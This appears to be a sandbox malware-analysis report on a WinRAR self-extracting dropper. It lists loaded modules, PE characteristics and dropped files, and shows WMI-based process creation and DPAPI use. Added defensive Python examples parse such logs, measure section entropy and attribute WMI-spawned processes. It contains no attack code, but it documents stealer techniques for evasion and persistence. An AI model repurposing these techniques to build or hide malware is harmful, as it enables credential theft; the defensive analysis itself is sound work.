                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: sspicli.dll
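The loaded-module lists above are raw report output; what an analyst actually wants from them is, per process, which capabilities the module set implies (managed code, HTTP client, WMI client, DPAPI decryption, and so on) and whether a process with those capabilities is running from a user-writable path such as the Temp directory. The following Python is an added example written for this page, not part of the Joe Sandbox report or the sample's code. It parses "Section loaded" lines in either the fused form the text export produces or the separated form, groups them by process image, and maps DLL names to capability tags. The DLL roles are the documented purposes of those Windows libraries; the tag names, the user-writable-path heuristic and the threshold of three capabilities are this example's own choices. The sample lines are a constructed subset copied from this report.

```python
import re
from collections import defaultdict

# Constructed sample: ten "Section loaded" lines from this report, some in the raw
# fused form the text export produces and some with a " | " separator.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\PING.EXE | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: winmm.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
"""

# "Source: <image>[ | ]Section loaded: <dll>[Jump to behavior]"
LINE_RE = re.compile(
    r"^Source:\s*(?P<image>.+?)\s*\|?\s*Section loaded:\s*(?P<dll>\S+?)\s*(?:Jump to behavior)?\s*$"
)

# Documented roles of the DLLs; the capability tag names are this example's own.
DLL_ROLES = {
    "mscoree.dll": "dotnet-runtime",   # CLR shim: the image is a managed executable
    "amsi.dll": "amsi-scanned",        # .NET Framework 4.8+ loads it to scan in-memory assembly loads
    "winhttp.dll": "http-client",      # WinHTTP outbound web requests
    "wininet.dll": "http-client",
    "dnsapi.dll": "network",           # DNS resolution
    "iphlpapi.dll": "network",         # IP helper: adapter and route enumeration
    "wbemcomn.dll": "wmi-client",      # WMI client-side common library
    "fastprox.dll": "wmi-client",      # WMI object marshalling
    "dpapi.dll": "dpapi",              # CryptUnprotectData, used to decrypt saved browser secrets
    "rsaenh.dll": "cryptoapi",         # CryptoAPI RSA/AES provider
    "cryptsp.dll": "cryptoapi",
    "qmgr.dll": "bits",                # BITS transfer service
}

def parse_section_loaded(text):
    """Return [(image_path, dll_lowercase)] for every report line that parses."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            out.append((m.group("image"), m.group("dll").lower()))
    return out

def capabilities_by_process(pairs):
    """Group loaded modules by process image and map them to capability tags."""
    caps = defaultdict(lambda: defaultdict(set))
    for image, dll in pairs:
        role = DLL_ROLES.get(dll)
        if role:
            caps[image][role].add(dll)
    return caps

def is_user_writable(image):
    """Heuristic: images under the user profile or any Temp directory."""
    p = image.lower()
    return p.startswith("c:\\users\\") or "\\appdata\\" in p or "\\temp\\" in p

def triage(text, min_caps=3):
    """Flag processes run from user-writable paths with at least min_caps capabilities."""
    caps = capabilities_by_process(parse_section_loaded(text))
    flagged = []
    for image, roles in caps.items():
        if is_user_writable(image) and len(roles) >= min_caps:
            flagged.append((image, sorted(roles)))
    return sorted(flagged)

if __name__ == "__main__":
    for image, roles in triage(SAMPLE_LINES):
        print(image, "->", ", ".join(roles))
```

On the sample, only the Temp-directory executable is flagged: a managed binary that loads the HTTP client, the WMI client library and DPAPI at once, which is the combination the rest of this report documents. System processes such as PING.EXE and WmiPrvSE.exe load overlapping DLLs but live under C:\Windows and are left alone.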
                                   Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                   Source: Window Recorder | Window detected: More than 3 window changes detected
                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                   Source: file.exe | Static file information: File size 2331371 > 1048576
                                   Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                   Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                   Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                   Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                   Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                   Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                   Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                   Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: file.exe
                                   Source: Binary string: WINLOA~1.PDBwinload_prod.pdb | source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2943770878.000000001CFAE000.00000004.00000020.00020000.00000000.sdmp
                                   Source: Binary string: AppDINetCookntkrnlmp.pdb | source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2943770878.000000001CFAE000.00000004.00000020.00020000.00000000.sdmp
                                   Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                   Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                   Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                   Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                   Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                   Source: C:\Users\user\Desktop\file.exe | File created: C:\MsContainer\__tmp_rar_sfx_access_check_4612281
                                   Source: file.exe | Static PE information: section name: .didat
                                   Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4F640 push ecx; ret 0_2_00E4F653
                                   Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4EB78 push eax; ret 0_2_00E4EB96
                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Code function: 4_2_00007FFD9B7800BD pushad ; iretd 4_2_00007FFD9B7800C1
                                   Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD9B66D2A5 pushad ; iretd 8_2_00007FFD9B66D2A6
                                   Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD9B7800BD pushad ; iretd 8_2_00007FFD9B7800C1
                                   Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD9B852316 push 8B485F92h; iretd 8_2_00007FFD9B85231B
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 14_2_00007FFD9B7DCD10 push eax; retf 5F4Dh 14_2_00007FFD9B7DD8FD
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 14_2_00007FFD9B7DCD10 push ss; retf 5F4Dh 14_2_00007FFD9B7DD937
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 14_2_00007FFD9B7800BD pushad ; iretd 14_2_00007FFD9B7800C1
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 14_2_00007FFD9BCF8D72 push B9FFFFFEh; ret 14_2_00007FFD9BCF8D77
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 14_2_00007FFD9BCF0528 push es; retf 14_2_00007FFD9BCF0527
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 14_2_00007FFD9BCF0104 push es; retf 14_2_00007FFD9BCF0527
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 15_2_00007FFD9B7700BD pushad ; iretd 15_2_00007FFD9B7700C1
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 19_2_00007FFD9B7900BD pushad ; iretd 19_2_00007FFD9B7900C1
                                   Source: chainportruntimeCrtMonitor.exe.0.dr | Static PE information: section name: .text entropy: 7.571044505376463
                                   Source: kahKUDRlEYHfKIalWlM.exe.4.dr | Static PE information: section name: .text entropy: 7.571044505376463
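The static checks listed above come down to three things read straight from the PE headers and raw bytes: the DllCharacteristics flags (DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE), per-section Shannon entropy (7.57 bits per byte for the dropped files' .text, which is in packed or encrypted territory), and build-path leaks such as the sfxrar.pdb string that identifies the outer layer as a WinRAR SFX stub. The Python below is an added example, not Joe Sandbox's code or the sample's, showing how those checks are computed from a file without a third-party PE library. Header offsets follow the PE/COFF specification. The sample image is constructed in memory for offline testing (the .text bytes are chained SHA-256 output standing in for packed code, and .rdata carries the PDB path quoted in the report); it is not a real program and has no entry point.

```python
import hashlib
import math
import re
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte: 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)

def parse_pe(blob):
    """Minimal PE parser: (sorted DllCharacteristics flag names, list of section records)."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe_off = struct.unpack_from("<I", blob, 0x3C)[0]            # e_lfanew
    if blob[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    size_opt = struct.unpack_from("<H", blob, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic not in (0x10B, 0x20B):                              # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+.
    dllchar = struct.unpack_from("<H", blob, opt + 70)[0]
    flags = sorted(name for bit, name in DLL_CHARACTERISTICS.items() if dllchar & bit)
    sections = []
    for i in range(num_sections):
        hdr = opt + size_opt + 40 * i                            # section headers are 40 bytes each
        name = blob[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, rva, raw_size, raw_ptr = struct.unpack_from("<IIII", blob, hdr + 8)
        raw = blob[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "rva": rva, "virtual_size": vsize,
                         "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    return flags, sections

def packed_sections(sections, threshold=7.0):
    """Names of sections whose raw bytes look compressed or encrypted."""
    return [s["name"] for s in sections if s["entropy"] >= threshold]

def find_pdb_paths(blob):
    """Printable '<drive>:\\...\\name.pdb' strings, the build-path leak listed above."""
    return [m.decode("ascii") for m in re.findall(rb"[A-Za-z]:\\[ -~]*?\.pdb", blob)]

def build_sample_pe():
    """Constructed two-section PE32 image for offline testing; not a real program."""
    text_raw = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))   # 512 high-entropy bytes
    rdata_raw = b"D:\\Projects\\WinRAR\\sfx\\build\\sfxrar32\\Release\\sfxrar.pdb\0".ljust(512, b"\0")
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                                         # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)                   # i386, 2 sections, PE32 optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x4000 | 0x8000)              # the four flags seen in this report

    def section(name, rva, raw_ptr, raw_len):
        return struct.pack("<8sIIIIIIHHI", name, raw_len, rva, raw_len, raw_ptr, 0, 0, 0, 0, 0x60000020)

    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt)
               + section(b".text", 0x1000, 0x200, 512)
               + section(b".rdata", 0x2000, 0x400, 512)).ljust(0x200, b"\0")
    return headers + text_raw + rdata_raw

def triage(blob):
    """One-shot summary in the spirit of the static checks listed above."""
    flags, sections = parse_pe(blob)
    return {"dll_characteristics": flags, "sections": sections,
            "packed": packed_sections(sections), "pdb_paths": find_pdb_paths(blob)}

if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(key, value)
```

To run it against the real files, read the bytes of file.exe or one of the dropped executables and pass them to triage(); the 7.0 threshold is a common rule of thumb rather than a hard boundary, and a .NET assembly with a large encrypted resource will cross it just as a conventional packer does.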

                                  Persistence and Installation Behavior

                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (3 calls)
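A process started through Win32_Process::Create is created by the WMI provider host, so in any process tree its parent is WmiPrvSE.exe rather than the process that asked for it; the chain from chainportruntimeCrtMonitor.exe to its child is broken at exactly the point a parent-child rule would look. The Python below is an added example for this page (not part of the report or the sample) of the correlation an analyst does to restore that link: take process-creation events whose parent is WmiPrvSE.exe and attribute each to the most recent process that loaded a WMI client library (wbemcomn.dll, fastprox.dll) shortly before. The events are constructed Sysmon-style records (event 1 process create, event 7 image load) with invented PIDs and timestamps; the image names follow this report. The 30-second window and the choice of "most recent loader" are this example's heuristics.

```python
# Constructed Sysmon-style events: id 7 = image load, id 1 = process create.
# PIDs and timestamps are invented; image names follow the processes in this report.
EVENTS = [
    {"t": 10.0, "id": 7, "pid": 2208, "image": r"C:\MsContainer\chainportruntimeCrtMonitor.exe",
     "loaded": "wbemcomn.dll"},
    {"t": 10.2, "id": 7, "pid": 2208, "image": r"C:\MsContainer\chainportruntimeCrtMonitor.exe",
     "loaded": "fastprox.dll"},
    {"t": 10.5, "id": 1, "pid": 5120, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ppid": 792, "parent_image": r"C:\Windows\System32\svchost.exe"},
    {"t": 10.9, "id": 1, "pid": 5288, "image": r"C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe",
     "ppid": 5120, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"t": 40.0, "id": 1, "pid": 6000, "image": r"C:\Windows\System32\notepad.exe",
     "ppid": 3000, "parent_image": r"C:\Windows\explorer.exe"},
    {"t": 95.0, "id": 1, "pid": 6100, "image": r"C:\Windows\System32\cmd.exe",
     "ppid": 5120, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
]

WMI_CLIENT_DLLS = {"wbemcomn.dll", "fastprox.dll", "wbemprox.dll"}   # client-side WMI libraries
WMI_HOST = "wmiprvse.exe"

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_wmi_spawned(events):
    """Process-create events whose recorded parent is the WMI provider host."""
    return [e for e in events if e["id"] == 1 and _basename(e["parent_image"]) == WMI_HOST]

def attribute_wmi_caller(events, window=30.0):
    """For each WmiPrvSE.exe child, name the most recent process (other than the host itself)
    that loaded a WMI client DLL within `window` seconds before the child was created."""
    loads = sorted((e for e in events if e["id"] == 7 and e["loaded"].lower() in WMI_CLIENT_DLLS),
                   key=lambda e: e["t"])
    results = []
    for child in find_wmi_spawned(events):
        caller = None
        for load in loads:
            if _basename(load["image"]) == WMI_HOST:
                continue
            if child["t"] - window <= load["t"] <= child["t"]:
                caller = load          # loads are time-ordered, so the last hit is the most recent
        results.append({
            "child": child["image"],
            "child_pid": child["pid"],
            "probable_caller": caller["image"] if caller else None,
            "probable_caller_pid": caller["pid"] if caller else None,
        })
    return results

if __name__ == "__main__":
    for r in attribute_wmi_caller(EVENTS):
        print(r["child_pid"], r["child"], "<- via WMI from", r["probable_caller"] or "(unattributed)")
```

The first WmiPrvSE.exe child is attributed to chainportruntimeCrtMonitor.exe; the second, created long after any WMI client library load, stays unattributed rather than being guessed, which is the right failure mode for a heuristic. Where the Microsoft-Windows-WMI-Activity trace log is enabled it records the client process ID for each operation directly and this correlation is unnecessary.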
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File created: C:\Users\user\Desktop\jYCYFtEB.log
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File created: C:\Users\user\Desktop\GYwcCMoE.log
                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File created: C:\Users\user\Desktop\QRPSxHgy.log
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File created: C:\Users\user\Desktop\WzsROUza.log
                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File created: C:\Users\user\Desktop\aEtIhTbg.log
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File created: C:\Users\user\Desktop\pQfxiZJp.log
                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File created: C:\Users\user\Desktop\HnGdNOQQ.log
                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File created: C:\Users\user\Desktop\vCAeICGo.log
                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File created: C:\Users\user\Desktop\YuXIhBvf.log
                                   Source: C:\Users\user\Desktop\file.exe | File created: C:\MsContainer\chainportruntimeCrtMonitor.exe
                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File created: C:\Users\user\Desktop\vJIWLFOd.log
                                   Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File created: C:\Users\user\Desktop\UFpBXUVk.log
                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File created: C:\Users\user\Desktop\ZlAIxOci.log

                                  Hooking and other Techniques for Hiding and Protection

                                   Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 times)
                                   Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 times)
                                   Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 times)
                                   Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                                   Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Process information set: NOOPENFILEERRORBOX (24 times)
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
